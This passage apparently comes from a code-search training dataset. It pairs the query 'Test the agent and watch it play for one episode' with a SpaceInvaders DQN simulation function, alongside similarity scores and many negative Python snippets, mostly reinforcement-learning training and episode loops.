1=accept\n\n # 2- The agent take an action (with softmax) considering is current state-action table\n # [0=cup, 1=book, 2=ball]\n col = (image_index * self.tot_images) + label_index\n action_array = self.actor_matrix[:, col]\n action_distribution = self._softmax(action_array)\n child_action = np.random.choice(self.tot_actions,\n 1,\n p=action_distribution) # select the action through softmax\n\n # 3- (External) New state and reward obtained from the environment\n # u_t = self.critic_vector[0, col] # previous state\n # New state is estimated, in this simple case nothing happen\n # because the next state is terminal\n # u_t1 = u_t # Only in this example they are the same\n\n # 4- (Intrinsic) The informant_reputation is updated:\n # agent_action, agent_confidence, informant_action, reward\n # informant_vector: 0=unreliable, 1=reliable\n # do_actions_agree: False, True\n # Estimating child_confidence\n distance = np.absolute(action_distribution[0] - action_distribution[1])\n child_confidence_distribution = [1 - distance, distance] # non-knowledgeable, knowledgeable\n child_confidence = np.random.choice(2, 1, p=child_confidence_distribution)\n # Check if child and informant agree\n if (child_action == informant_action):\n do_actions_agree = True\n else:\n do_actions_agree = False\n # Increment the counter in the informant_vector.\n # Here we update the counter distribtuion only if\n # the child is confident, because it is only in that\n # case that the child can say if the informant is\n # reliable or not.\n if (do_actions_agree == False and child_confidence == 1):\n self.informant_vector[informant_index][0] += 1 # unreliable\n elif (do_actions_agree == True and 
child_confidence == 1):\n self.informant_vector[informant_index][1] += 1 # reliable\n elif (do_actions_agree == False and child_confidence == 0):\n self.informant_vector[informant_index][1] += 0 # reliable\n self.informant_vector[informant_index][0] += 0 # unreliable\n elif (do_actions_agree == True and child_confidence == 0):\n self.informant_vector[informant_index][1] += 0 # reliable\n self.informant_vector[informant_index][0] += 0 # unreliable\n else:\n raise ValueError(\"ERROR: anomaly in the IF condition for informant_vector update\")\n # Using the informant_vector given as input it estimates the reputation of the informant\n informant_reputation_distribution = np.true_divide(self.informant_vector[informant_index],\n np.sum(self.informant_vector[informant_index]))\n informant_reputation = np.random.choice(2, 1, p=informant_reputation_distribution)\n\n # 5- (Intrinsic) The Cost is estimated:\n # current_state, agent_action, agent_confidence, informant_action, informant_reputation\n # child_confidence: 0=non-knowledgeable, 1=knowledgeable\n # informant_reputation: 0=non-knowledgeable, 1=knowledgeable\n # action: 0=reject, 1=accept\n # informant_action: 0=reject, 1=accept\n cost = self._return_cost(child_confidence,\n informant_reputation,\n child_action,\n informant_action,\n value=model)\n\n # 6- The utility table is updated using: previous_state, current_state, cost, reward\n # Updating the critic using Temporal Differencing Learning\n # In this simple case there is not a u_t1 state.\n # The current state is considered terminal.\n # We can delete the term (gamma*u_t1)-u_t and considering\n # only (reward-cost) as utility of the state (see Russel Norvig).\n reward = 0 # only for intrinsic learning reward=0\n delta = (reward - cost) # + (gamma*u_t1) - u_t\n self.critic_vector[0, col] += learning_rate * delta\n\n # 7- The actor table is updated using the delta from the critic\n # Update the ACTOR using the delta\n self.actor_matrix[child_action, col] += learning_rate * delta # the current action\n self.actor_matrix[1 - child_action, col] -= learning_rate * delta # the opposite action", "def train_ddpg(agent, env, n_episodes=400, max_t=1000, save=True):\n # get the default brain\n brain_name = env.brain_names[0]\n scores_deque = deque(maxlen=100)\n final_scores = []\n not_solved = True\n num_agents = len(env.reset()[brain_name].vector_observations)\n best = 0\n episodes_remaining = n_episodes\n for i_episode in range(1, n_episodes+1):\n env_info = env.reset()[brain_name]\n states = env_info.vector_observations\n agent.reset()\n agent_scores = np.zeros(num_agents)\n for t in range(max_t):\n actions = agent.act(states)\n env_info = env.step(actions)[brain_name]\n next_states = env_info.vector_observations\n rewards = env_info.rewards\n dones = env_info.local_done\n agent.step(states, actions, rewards, next_states, dones)\n states = next_states\n agent_scores += rewards\n if np.any(dones):\n break\n\n max_score = np.max(agent_scores)\n scores_deque.append(max_score)\n final_scores.append(max_score)\n print('\\rEpisode {}\\tAverage Score: {:.2f}\\tScore: {:.2f}'.format(i_episode, np.mean(scores_deque), max_score), end=\"\", flush=True)\n if len(scores_deque) == 100 and np.mean(scores_deque) > SOLVED_SCORE and not_solved:\n not_solved = False\n episodes_remaining = EPISODES_AFTER_SOLVE # try to increase score for some episodes\n print(\"\\nEnvironment solved in {} episodes!\\n\".format(i_episode), flush=True)\n if save:\n torch.save(agent.actor_local.state_dict(), 
'saved_models/actor_solved.pth')\n torch.save(agent.critic_local.state_dict(), 'saved_models/critic_solved.pth')\n if i_episode % 100 == 0:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_deque)), flush=True)\n\n if not not_solved and i_episode % 5 == 0 and np.mean(scores_deque) > best:\n best = np.mean(scores_deque)\n if save:\n torch.save(agent.actor_local.state_dict(), 'saved_models/best_actor.pth')\n torch.save(agent.critic_local.state_dict(), 'saved_models/best_critic.pth')\n\n if not not_solved:\n episodes_remaining -= 1\n if episodes_remaining == 0:\n break\n\n return final_scores", "def train(self, persist: bool = False, run: int = -1, checkpoint: int = -1):\n self.meta = ICMMetaDataV1(fp=open(os.path.join(MODULE_CONFIG.BaseConfig.BASE_DIR, 'agent_stats.csv'), 'w'),\n args=self.state.config)\n train_start = time.time()\n for episode in range(self.state.episodes):\n start_time = time.time()\n state = self.env.reset()\n state = torch.reshape(tensor(state, dtype=torch.float32), [1, 84, 84, 4]).permute(0, 3, 1, 2).to(\n self.device)\n done = False\n episode_reward = []\n episode_loss = []\n\n # save network\n # if episode % self.state.model_save_interval == 0:\n # save_path = self.state.model_save_path + '/' + self.run_name + '_' + str(episode) + '.pt'\n # torch.save(self.q_network.state_dict(), save_path)\n # print('Successfully saved: ' + save_path)\n\n # Save Model\n self.save(episode)\n # Collect garbage\n # To Do Later\n\n while not done:\n\n # update target network\n if self.state.step % self.state.network_update_interval == 0:\n print('Updating target network')\n self.target_network.load_state_dict(self.q_network.state_dict())\n\n if self.state.step > len(self.replay_memory):\n self.state.epsilon = max(self.state.final_epsilon,\n self.state.initial_epsilon - self.state.epsilon_step * self.state.step)\n if self.state.epsilon > self.state.final_epsilon:\n self.state.mode = 'Explore'\n else:\n self.state.mode = 'Exploit'\n\n action, q = self.take_action(state, test=False, state_count=0)\n next_state, reward, done, _ = self.env.step(action)\n\n next_state = torch.reshape(tensor(next_state, dtype=torch.float32), [1, 84, 84, 4]).permute(0, 3, 1,\n 2).to(\n self.device)\n self.push((state, torch.tensor([int(action)]), torch.tensor([reward], device=self.device), next_state,\n torch.tensor([done], dtype=torch.float32)))\n episode_reward.append(reward)\n self.state.step += 1\n state = next_state\n\n # train network\n if self.state.step >= self.start_to_learn and self.state.step % self.state.network_train_interval == 0:\n loss = self.optimize_network()\n episode_loss.append(loss)\n\n if done:\n # print('Episode:', episode, ' | Steps:', self.state.step, ' | Eps: ', self.state.epsilon,\n # ' | Reward: ',\n # sum(episode_reward),\n # ' | Avg Reward: ', np.mean(self.last_n_rewards), ' | Loss: ',\n # np.mean(episode_loss), ' | Intrinsic Reward: ', sum(self.intrinsic_episode_reward),\n # ' | Avg Intrinsic Reward: ', np.mean(self.last_n_intrinsic_rewards),\n # ' | Mode: ', self.state.mode)\n # print('Episode:', episode, ' | Steps:', self.state.step, ' | Eps: ', self.state.epsilon,\n # ' | Reward: ',\n # sum(episode_reward),\n # ' | Avg Reward: ', np.mean(self.last_n_rewards), ' | Loss: ',\n # np.mean(episode_loss), ' | Intrinsic Reward: ', sum(self.intrinsic_episode_reward),\n # ' | Avg Intrinsic Reward: ', np.mean(self.last_n_intrinsic_rewards),\n # ' | Mode: ', self.state.mode, file=self.log_file)\n # self.log_summary(episode, episode_loss, episode_reward)\n 
self.last_n_rewards.append(sum(episode_reward))\n self.last_n_intrinsic_rewards.append(sum(self.intrinsic_episode_reward))\n self.meta.update_episode(episode, self.state.step, self.state.epsilon,\n sum(episode_reward), np.mean(self.last_n_rewards),\n np.mean(episode_loss), sum(self.intrinsic_episode_reward),\n np.mean(self.last_n_intrinsic_rewards), self.state.mode)\n\n episode_reward.clear()\n episode_loss.clear()\n self.intrinsic_episode_reward.clear()" ]
[ "0.75523275", "0.743832", "0.74258286", "0.7422637", "0.7364126", "0.73365295", "0.73187625", "0.72586364", "0.7242011", "0.7233209", "0.72105044", "0.7161378", "0.71507365", "0.713142", "0.71212167", "0.71001995", "0.7051916", "0.7029939", "0.7000444", "0.6976201", "0.69314533", "0.6915431", "0.69015545", "0.6894078", "0.68907684", "0.68884885", "0.6881044", "0.68423784", "0.679889", "0.67598325", "0.67593294", "0.6724972", "0.6722011", "0.67207557", "0.668557", "0.66777647", "0.6665364", "0.6660342", "0.6654145", "0.6651742", "0.66388226", "0.663298", "0.66253185", "0.66232175", "0.66160107", "0.6615185", "0.6581718", "0.65808004", "0.65801597", "0.65799236", "0.6573005", "0.6571938", "0.6570316", "0.65682286", "0.654321", "0.6539214", "0.6538776", "0.65385246", "0.65346813", "0.6527291", "0.65263265", "0.6517368", "0.65134066", "0.6510297", "0.65061164", "0.6503084", "0.64991164", "0.6496695", "0.6493429", "0.6487343", "0.64844394", "0.64721686", "0.647178", "0.6454772", "0.6454772", "0.6454772", "0.6454772", "0.643299", "0.6431333", "0.64186037", "0.6416292", "0.6410764", "0.6408612", "0.64061856", "0.64039975", "0.6397238", "0.6397238", "0.6397238", "0.6397238", "0.6397238", "0.638773", "0.6385073", "0.6384868", "0.637654", "0.63701266", "0.63694817", "0.6364117", "0.63626534", "0.6361415", "0.6353743" ]
0.66573066
38
Test the agent and watch it play for one episode.
def simulate(self): print("##################################") print("SIMULATING GAME - SpaceInvaders..") print("##################################") # Play 3 episodes: for i in range(3): print("Playing Episode %d" % i) state = self.env.reset() #self.env.render() done = False tot_reward = 0 state,_ = stack_frames(self.stack_size,self.stacked_frames, state, True) # play until dead. while not done: # get the value predicted by the model and perform that action. # keras conv2d expects a 4D input. So add an empty axis. state = np.expand_dims(state, axis=0) # predict action directly from the saved neural network. action = np.argmax(self.dqn.getModel().predict(state)[0]) # perform that action. state, reward, done, _ = self.env.step(action) self.env.render() state,_ = stack_frames(self.stack_size,self.stacked_frames, state, False) tot_reward+=reward print("Reward: ", tot_reward) self.env.close() # to avoid sys.meta_path error
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test():\n env = gym.make('CartPole-v1')\n\n results = []\n for _ in range(100):\n results.append(episode(env, render=False, verbose=False))\n\n print(f'average={sum(results) / len(results)} '\n f'max={max(results)} '\n f'min={min(results)}')", "def test_scraper(self):\n scrap = ScraperModule(url=self.anime_link, host=\"mixdrop\")\n pages = scrap.pages\n print(f\"pages: {pages}\")\n get_pages = scrap.get_pages()\n first_link = scrap.get_links(pages[0])\n print(first_link)\n episodes = scrap.get_episodes()\n print(episodes)", "def play(self, test_ep=0., n_step=10000, n_episode=1000):\n\n # If not training, clear log of old data, initialize TF variables, and load model.\n if self.stat and not self.is_train:\n tf.initialize_all_variables().run()\n self.stat.load_model()\n\n self.target_network.run_copy()\n\n rewards = []\n game_lengths = []\n\n # Play at least n_episode episodes.\n while np.sum(game_lengths) < n_episode:\n\n # Start a new game.\n observation, reward, terminal = self.new_game()\n current_reward = 0\n\n # Add initial frames to history.\n for _ in range(self.history_length):\n self.history.add(observation)\n\n # Play game until 'terminal.'\n for t in range(n_step):\n # 1. Predict.\n action = self.predict(self.history.get(), test_ep)\n # 2. Act.\n observation, reward, terminal, _ = self.env.step(action, is_training=False)\n # 3. Observe.\n self.history.add(observation)\n \n current_reward += reward\n\n if terminal:\n break\n\n # Set tqdm range description.\n if self.t_range and not self.chtc:\n self.t_range.set_description('PLAY: %d/%d' % (np.sum(game_lengths), n_episode))\n\n # After game, add game length and rewards.\n rewards.append(float(current_reward))\n game_lengths.append(terminal)\n\n if self.t_range and not self.chtc:\n self.t_range.set_description()\n \n self.compute_statistics(rewards, game_lengths)", "def OnEnterEpisode(self):\n pass", "def run_episode(self):\n self.pygame_clock = pygame.time.Clock()\n while True:\n pygame.event.pump()\n is_human_agent = isinstance(self.agents[self.env.turn], HumanAgent)\n\n # handle exit event\n self.handle_input_event()\n\n # pick the next action\n if is_human_agent:\n self.handle_input_event()\n else:\n self.ai_event()\n self.place_a_disk()\n self.render()\n\n if self.event == Event.END_GAME:\n pygame.time.wait(self.END_GAME_DELAY)\n\n if self.event == Event.END_GAME_VIEW:\n pygame.time.wait(self.END_GAME_VIEW_DELAY)\n break", "def set_episode_check(self, alias, epi, check):\n re_m = re.match(r's(\\d{1,2})e(\\d{1,2})', epi.lower())\n if not re_m:\n print('Bad format for check - \"{0}\"'.format(epi))\n else:\n season = int(re_m.group(1))\n episode = int(re_m.group(2))\n show_id = self.id_by_title(self.title_by_alias(alias, no_exit=True))\n epis = self.load_episodes(show_id)\n watched = self.load_watched(show_id)\n episodes = epis['episodes']\n for epi_id in episodes:\n next_episode = episodes[epi_id]\n if (\n next_episode['seasonNumber'] == season and\n next_episode['episodeNumber'] == episode\n ):\n valid_op = False\n old_date = ''\n if check:\n msg = 'checked'\n if epi_id in watched:\n old_date = watched[epi_id]['watchDate']\n else:\n url = self.config['url']['check_episode'].format(epi_id)\n valid_op = True\n else:\n msg = 'unchecked'\n if epi_id in watched:\n url = self.config['url']['uncheck_episode'].format(epi_id)\n valid_op = True\n\n if not valid_op:\n print()\n print('Episode \"{0}\" (s{1:02d}e{2:02d}) of \"{3}\" already {4} {5}'\n .format(\n tr_out(next_episode['title']),\n next_episode['seasonNumber'],\n 
next_episode['episodeNumber'],\n tr_out(epis['title']),\n msg,\n old_date\n ))\n else:\n logging.debug('Set checked: %s%s', self.api_url, url)\n request = urllib.request.Request(self.api_url + url)\n self.opener.open(request)\n print()\n print(\n 'Episode \"{0}\" (s{1:02d}e{2:02d}) of \"{3}\" set {4}'\n .format(\n tr_out(next_episode['title']),\n next_episode['seasonNumber'],\n next_episode['episodeNumber'],\n tr_out(epis['title']),\n msg\n ))\n break", "def test_create_episode(self):\n episode = self._create_sample_episode()\n\n self.assertEqual(\n self.storage.get_episode(episode.study_id, episode.session_id,\n episode.id), episode)", "def test(self):\n total_steps = 0\n running_scores = np.zeros(len(self.agents))\n\n for e in range(self.run_settings.test_episodes):\n # Initialize episode\n try:\n env_states, rewards, done, metainfo = self.custom_env.reset()\n except EpisodeCrashException:\n print('Episode crashed, resetting.')\n continue\n\n # Initialize scores to starting reward (probably 0)\n scores = np.array(rewards)\n step = 0\n\n while not done:\n states = [self.agents[a].state_space_converter(env_states[a])\n for a in range(len(self.agents))]\n\n # Get actions\n actions = [self.agents[a].sample(states[a])\n for a in range(len(self.agents))]\n env_actions = [self.agents[a].action_space_converter(actions[a])\n for a in range(len(self.agents))]\n if self.run_settings.verbose:\n self.print_action(env_actions)\n # Take environment step\n try:\n env_states, rewards, done, metainfo = self.custom_env.step(env_actions)\n except EpisodeCrashException:\n print('Episode crashed, resetting.')\n break\n step += 1\n total_steps += 1\n\n # Update scores\n scores += np.array(rewards)\n\n if done:\n running_scores += scores\n\n if len(scores) == 1:\n scores = scores[0]\n if self.run_settings.verbose:\n print(\"Game {} ended after {} steps. Game score: {}\"\n .format(e+1, step, scores))\n if self.run_settings.verbose:\n print(\"Average game scores: {}\".format(running_scores / self.run_settings.test_episodes))", "def OnEpisodeStart(self):\n pass", "def test_get_episode_overview(self):\n self.assertEquals(\n self.t['Battlestar Galactica (2003)'][1][6]['overview'].startswith(\n 'When a new copy of Doral, a Cylon who had been previously'),\n True\n )", "def new_episode(self):\n self.game.new_episode()", "def executeEpisode(self):\n trainExamples = []\n board = self.game.getInitBoard()\n player = 1\n episodeStep = 0\n\n while True:\n episodeStep += 1\n canonicalBoard = self.game.getCanonicalForm(board, player)\n temp = int(episodeStep < self.args.tempThreshold)\n\n pi = self.mcts.getActionProb(canonicalBoard, temp=temp)\n sym = self.game.getSymmetries(canonicalBoard, pi)\n for b, p in sym:\n trainExamples.append([b, player, p, None])\n\n action = np.random.choice(len(pi), p=pi)\n board, player = self.game.getNextState(board, player, action)\n\n r = self.game.getGameEnded(board, player)\n\n if r != 0:\n ex = [(x[0], x[2], r * ((-1) ** (x[1] != player))) for x in trainExamples]\n return ex", "def testBeginEpisode(self):\n with tf.compat.v1.Session() as sess:\n agent = self._create_test_agent(sess)\n # We fill up the state with 9s. 
On calling agent.begin_episode the state\n # should be reset to all 0s.\n agent.state.fill(9)\n first_observation = np.ones(self.observation_shape + (1,))\n self.assertEqual(agent.begin_episode(first_observation), 0)\n # When the all-1s observation is received, it will be placed at the end of\n # the state.\n expected_state = self.zero_state\n expected_state[:, :, :, -1] = np.ones((1,) + self.observation_shape)\n self.assertAllEqual(agent.state, expected_state)\n self.assertAllEqual(agent._observation, first_observation[:, :, 0])\n # No training happens in eval mode.\n self.assertEqual(agent.training_steps, 0)\n\n # This will now cause training to happen.\n agent.eval_mode = False\n # Having a low replay memory add_count will prevent any of the\n # train/prefetch/sync ops from being called.\n agent._replay.memory.add_count = 0\n second_observation = np.ones(self.observation_shape + (1,)) * 2\n agent.begin_episode(second_observation)\n # The agent's state will be reset, so we will only be left with the all-2s\n # observation.\n expected_state[:, :, :, -1] = np.full((1,) + self.observation_shape, 2)\n self.assertAllEqual(agent.state, expected_state)\n self.assertAllEqual(agent._observation, second_observation[:, :, 0])\n # training_steps is incremented since we set eval_mode to False.\n self.assertEqual(agent.training_steps, 1)", "def run(self) -> None:\n for episode in range(1, self.episodes + 1):\n print('Episode:', episode)\n steps, state_action_history = self.run_one_episode()\n self.steps_per_episode.append(steps)\n if episode % parameters.CACHING_INTERVAL == 0 or steps < 1000:\n visualize.animate_track(state_action_history, f'agent-{episode}')\n\n print('Training completed.')\n visualize.plot_steps_per_episode(self.steps_per_episode)\n visualize.plot_epsilon(self.agent.epsilon_history)\n\n if parameters.VISUALIZE_FINAL_GAME:\n print('Showing one episode with the greedy strategy.')\n self.agent.epsilon = 0\n steps, state_action_history = self.run_one_episode()\n print(f'Episode completed in {steps} steps.')\n visualize.animate_track(state_action_history)", "def test_plays_get(self):\n pass", "def startEpisode(self):\n self.lastState = None\n self.lastAction = None\n self.episodeRewards = 0.0\n\n print(\"Agent Start Episode #\" + str(self.episodesSoFar+1))", "def watch_episode(logger, n_episodes: int = 1):\n\n # play match\n for episode in logger.observations:\n for steps in logger.observations[episode]:\n clear_output(wait=True)\n plt.imshow(steps)\n plt.show()\n if n_episodes - 1 >= episode:\n break", "def run_episode(self, mode=0, eps=0.):\n if mode==0:\n eps = 0.\n done = False\n score = 0 \n \n while not done:\n state = self.env_info.vector_observations[0] # get the current state\n action = self.agent.act(state, eps=eps) # get an action using epsilon greedy policy\n self.env_info = self.env.step(action)[self.brain_name] # send the action to the environment\n next_state = self.env_info.vector_observations[0] # get the next state\n reward = self.env_info.rewards[0] # get the reward\n done = self.env_info.local_done[0] # see if episode has finished\n \n if mode == 1:\n self.agent.step(state, action, reward, next_state, done)\n \n score += reward\n \n self.reset_env() # reset the environment\n \n return score", "def testPlayback(self):\n \n pass", "def start_episode(self):\n self.last_sensation = self.env()\n self.next_action = self.agent(self.last_sensation)", "def test_single_track_ep(self):\n self.add_mp3()\n (added, status) = self.app.add_album(self.filenames, 'ep')\n 
self.assertEqual(added, True)\n self.assertEqual(self.get_album_count(), 1)\n album = Album.get_by_artist_album(self.app.curs, 'Artist', 'Album')\n self.assertNotEqual(album, None)\n self.assertEqual(album.artist, 'Artist')\n self.assertEqual(album.album, 'Album')\n self.assertEqual(album.album_type, 'ep')\n self.assertEqual(album.totalseconds, 2)\n self.assertEqual(album.totaltracks, 1)", "def show_next_for_watch(self, alias):\n show_id = self.id_by_title(self.title_by_alias(alias, no_exit=True))\n epis = self.load_episodes(show_id)\n episode_id = self.get_first_unwatched(show_id)\n if episode_id is None:\n print(\"\\nCannot find first watch for {0}\\n\".format(tr_out(epis['title'])))\n else:\n episode = epis['episodes'][episode_id]\n print('\\nFirst watch for {0} is s{1:02d}e{2:02d} (\"{3}\")\\n'.format(\n tr_out(epis['title']),\n episode['seasonNumber'], episode['episodeNumber'],\n tr_out(episode['title']),\n ))", "def OnEpisodeOver(self):\n pass", "def run(self):\n time.sleep(np.random.rand())\n np.random.seed(np.int32(time.time() % 1000 * self.id))\n \n # Put this in a while loop that checks a shared variable\n # Will keep running episodes until the shared variable reports False\n while(self.exit_flag == 0):\n for experience in self.run_episode():\n print(experience.state, experience.reward)\n self.training_q.put(experience)", "def add_episode(self, ep):\n #make da season\n ses = self._add_season(ep)\n dvdses = self._add_season(ep, dvd=True) \n self._add_episode(ep, ses)\n self._add_episode(ep, dvdses, dvd=True)", "def test_seasons(self):\n response = Tmdb.season(tmdb_show_id = 69740, season_number = 1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)", "def testGetEpisodeName(self):\n\t\tfor case in self.testCases:\n\t\t\tassert case['title'] == getEpisodeName( case['show'], case['season'], case['episode'])", "def begin_episode(self):\n self.action = PlayerAction.STAND_STILL", "def play_episodes(env, policy, render_option, num_eps, pause_time, min_steps):\n env.reset()\n if pause_time != 0:\n for _ in range(int(pause_time / 0.01)):\n env.render()\n time.sleep(0.01)\n total_reward = 0.0\n for _ in range(num_eps):\n episode_reward = play_episode(env, policy, render_option, min_steps)\n total_reward += episode_reward\n avg_reward = total_reward / num_eps\n print('finished {0} episodes with average reward {1}'.format(num_eps, avg_reward))\n return avg_reward", "def run(self, num_episodes=1):\n pygame.display.update()\n self.fps_clock = pygame.time.Clock()\n\n try:\n for episode in range(num_episodes):\n self.run_episode()\n self.env.new_episode()\n self.event = Event.next(self.event)\n except QuitRequestedError:\n print(\"Exit Program\")\n\n pygame.quit()", "def executeEpisode(self):\n trainExamples = []\n board = self.game.getInitBoard()\n self.curPlayer = 1\n episodeStep = 0\n\n while True:\n episodeStep += 1\n canonicalBoard = self.game.getCanonicalForm(board, self.curPlayer)\n temp = int(episodeStep < self.args.tempThreshold)\n\n pi = self.mcts.getActionProb(canonicalBoard, temp=temp)\n sym = self.game.getSymmetries(canonicalBoard, pi)\n for b, p in sym:\n trainExamples.append([b, self.curPlayer, p, None])\n\n action = np.random.choice(len(pi), p=pi)\n board, self.curPlayer = self.game.getNextState(board, self.curPlayer, action)\n\n r = self.game.getGameEnded(board, self.curPlayer)\n\n if r != 0:\n return [(x[0], x[2], r * 
((-1) ** (x[1] != self.curPlayer))) for x in trainExamples]", "def executeEpisode(self):\n trainExamples = []\n board = self.game.getInitBoard()\n self.curPlayer = 1\n episodeStep = 0\n\n while True:\n episodeStep += 1\n canonicalBoard = self.game.getCanonicalForm(board, self.curPlayer)\n temp = int(episodeStep < self.args.tempThreshold)\n\n pi = self.mcts.getActionProb(canonicalBoard, temp=temp)\n sym = self.game.getSymmetries(canonicalBoard, pi)\n for b, p in sym:\n trainExamples.append([b, self.curPlayer, p, None])\n\n action = np.random.choice(len(pi), p=pi)\n board, self.curPlayer = self.game.getNextState(board, self.curPlayer, action)\n\n r = self.game.getGameEnded(board, self.curPlayer)\n\n if r != 0:\n return [(x[0], x[2], r * ((-1) ** (x[1] != self.curPlayer))) for x in trainExamples]", "def play(self):\n if not self.tiempos.esta_vacia():\n self._reproducir(self.tiempos.actual())", "def terminal_test(self):\n\n for self.cur_ep in tqdm.tqdm(range(1, self.episodes + 1), ascii=True, unit='episodes'):\n\n # Nombre de passages dans la boucle principale\n step = 1\n\n cur_state = self.env.reset()\n\n done = False\n\n while not done:\n\n # Choix au hasard entre :\n if np.random.random() > self.epsilon:\n # Action à partir de la q-table\n action = np.argmax(self.agent.get_q_values(np.array(cur_state)))\n\n else:\n # Action random\n action = np.random.randint(0, self.env.ACTION_SPACE_SIZE)\n\n # On effectue une action avec le serpent\n new_state, reward, done = self.env.step(action)\n\n # Ajout d'un exemple dans la mémoire\n self.agent.update_training_set((cur_state, action, reward, new_state, done))\n\n # Entrainement éventuel\n self.agent.train()\n\n cur_state = new_state\n step += 1\n\n if self.epsilon > self.MIN_EPSILON:\n self.epsilon *= self.EPSILON_DECAY\n self.epsilon = max(self.MIN_EPSILON, self.epsilon)\n\n if self.save_model:\n self.agent.save_model(self.model_file_name)", "def debug():\n env = gym.make('CartPole-v1')\n env = gym.wrappers.Monitor(env, 'videos/', force=True)\n reward = episode(env, render=True, verbose=True)\n print(f'Reward: {reward}')", "def play(self):\n observation = self.env.reset()\n count = 0\n reward_sum = 0\n random_episodes = 0\n\n while random_episodes < 10:\n self.env.render()\n x = observation.reshape(-1, 4)\n q_values = self.model.predict(x)[0]\n action = np.argmax(q_values)\n observation, reward, done, _ = self.env.step(action)\n count += 1\n reward_sum += reward\n\n if done:\n print(\"Reward for this episode was: {}, turns was: {}\".format(reward_sum, count))\n random_episodes += 1\n reward_sum = 0\n count = 0\n observation = self.env.reset()\n\n self.env.close()", "def run_episode(self):\n self.reset_episode()\n obs = self.env.reset()\n while True:\n action = self.Policy[self.env.stateDict[obs]]\n new_obs, reward, done, _ = self.env.step(action)\n if self.mode=='debug':\n print(\"PrevObs:{}, Action:{}, Obs:{}, Reward:{}, Done:{}\"\n .format(obs, action, new_obs,reward,done))\n self.totalReward += reward\n self.totalSteps += 1\n if done:\n break\n else:\n obs = new_obs\n return self.totalReward", "def episode_step(self):\n self.nsteps += 1", "def play_against_random(env, q_value, n_episodes = 100,\n play_as = 'O', render = False, self_play = False):\n \n assert play_as in ['X','O'], \"Player should be X or O\"\n \n \n running_reward = []\n \n for episode in range(n_episodes):\n \n #start episode\n state = env.reset()\n done = False\n \n while not done:\n \n if play_as == state[1] :\n #print(\"q learner\")\n action = e_greedy(state,env,q_value, 
inference = True)[0]\n \n else:\n if self_play:\n action = e_greedy(state,env,q_value, inference = True)[0]\n else:\n action = random_player(env)\n \n state,reward,done, _ = env.step(action)\n \n if render:\n env.render()\n print(reward, \"\\n\\n\")\n running_reward.append(reward)\n \n if play_as == 'X':\n running_reward = [-i for i in running_reward] \n \n performance = np.mean(running_reward)\n \n won = sum([1 if i == 1 else 0 for i in running_reward])\n lost = sum([1 if i == -1 else 0 for i in running_reward])\n draw = sum([1 if i == 0 else 0 for i in running_reward])\n \n #print(f\"Player : {play_as} | Performance : {performance} | Won: {won} | Lost: {lost} | Draw: {draw} | Total : {n_episodes}\")\n \n return (won,lost,draw)", "def play(self):\n p1 = self.player()\n p2 = axelrod.Player()\n p1.reset()\n p1.strategy(p2)\n # Genome contains only valid responses.\n self.assertEqual(p1.genome.count(C) + p1.genome.count(D), len(p1.genome))", "def stopEpisode(self):\n if self.episodesSoFar < self.numTraining:\n self.accumTrainRewards += self.episodeRewards\n else:\n self.accumTestRewards += self.episodeRewards\n self.episodesSoFar += 1\n if self.episodesSoFar >= self.numTraining:\n # Take off the training wheels\n self.epsilon = 0.0 # no exploration\n self.alpha = 0.0 # no learning", "def run_episode(self):\n # Reset environment\n self.agent.env.reset()\n done = False\n step_count = 0\n total_reward = 0\n\n while not done:\n reward, done = self.agent.explore()\n step_count += 1\n if step_count % 100 == 0:\n print('step count {}'.format(step_count))\n total_reward += self.agent.params['gamma']**step_count * reward\n return step_count, total_reward", "def _start_episode(self, test = False):\n self.env.true_reset()\n new_frame = self.env.reset()\n if not test:\n self.memory.add_experience(0, 0.0, new_frame, False)\n for i in range(self.num_stacked_frames):\n self._current_state[0, i] = new_frame\n new_frame, reward, done, _ = self.env.step(0)\n if not test:\n self.memory.add_experience(0, reward, new_frame, done)", "def stopEpisode(self):\n if self.episodesSoFar < self.numTraining:\n self.accumTrainRewards += self.episodeRewards\n else:\n self.accumTestRewards += self.episodeRewards\n self.episodesSoFar += 1\n if self.episodesSoFar >= self.numTraining:\n # Take off the training wheels\n self.epsilon = 1.0 # no exploration\n self.lr = 0.0 # no learning", "def test_download_specific_episode(self):\n episode = self._get_episode()\n torrent_filename = self.fetcher.download_specific_episode(episode)\n self.assertEqual(torrent_filename, FILENAME_2)", "def nukePlay():\n nuke.activeViewer().play(1)", "def test_save_unwatched_episodes(self):\n save_episodes(self.schedule.episodes)\n for show in FollowedShows.objects.filter(user_id=self.user.id):\n self.assertTrue(show.unwatchedepisode_set.all().count() > 0)", "def test_selecting_only_audio_episodes(\n only_audio_episodes: List[LepEpisode],\n) -> None:\n assert len(only_audio_episodes) == 14 # Without duplicates", "def play_game():\n pass", "def self_play(self, n_episodes): \n eps = self.eps(self.agent.learning_iters)\n experiences = self_play_episodes(self.mdp, self.agent, n_episodes, eps) \n for state, action, reward, next_state, done in experiences:\n self.agent.replay_buffer.push(state, action, reward, next_state, done)", "def test_episode_data(self):\n self.assertEquals(\n self.t['lost']['firstaired'],\n '2004-09-22'\n )", "def startEpisode(self):\n self.lastState = None\n self.lastAction = None\n self.episodeRewards = 0.0", "def explore(self, 
episode_count):\n # single agent, always use the `run_one_episode` api.\n # multi agent with `standalone` api_type, use the `run_one_episode` api.\n if self.env_info[\"api_type\"] == \"standalone\":\n # (use_explore, collect)\n _paras = [\n (True, False if _ag.alg.async_flag else True) for _ag in self.agents\n ]\n job_funcs = [agent.run_one_episode for agent in self.agents]\n for _epi_index in range(episode_count):\n _start2 = time()\n self.env.reset()\n for agent in self.agents:\n agent.reset()\n\n trajectory_list = self.bot.do_multi_job(job_funcs, _paras)\n for agent, trajectory in zip(self.agents, trajectory_list):\n if not agent.alg.async_flag:\n # self.trajectories.append(trajectory)\n self.send_explorer.send(trajectory)\n\n self._post_processes()\n self.ag_stats.explore_time_in_epi = time() - _start2\n\n if _epi_index == episode_count - 1:\n self.ag_stats.update_with_agent_stats(\n [agent.get_perf_stats() for agent in self.agents]\n )\n\n elif self.env_info[\"api_type\"] == \"unified\":\n for _ in range(episode_count):\n _start2 = time()\n trajectories = self._run_one_unified_episode(\n use_explore=True, collect=True)\n\n for _ag, trajectory in zip(self.agents, trajectories):\n if not _ag.alg.async_flag:\n # 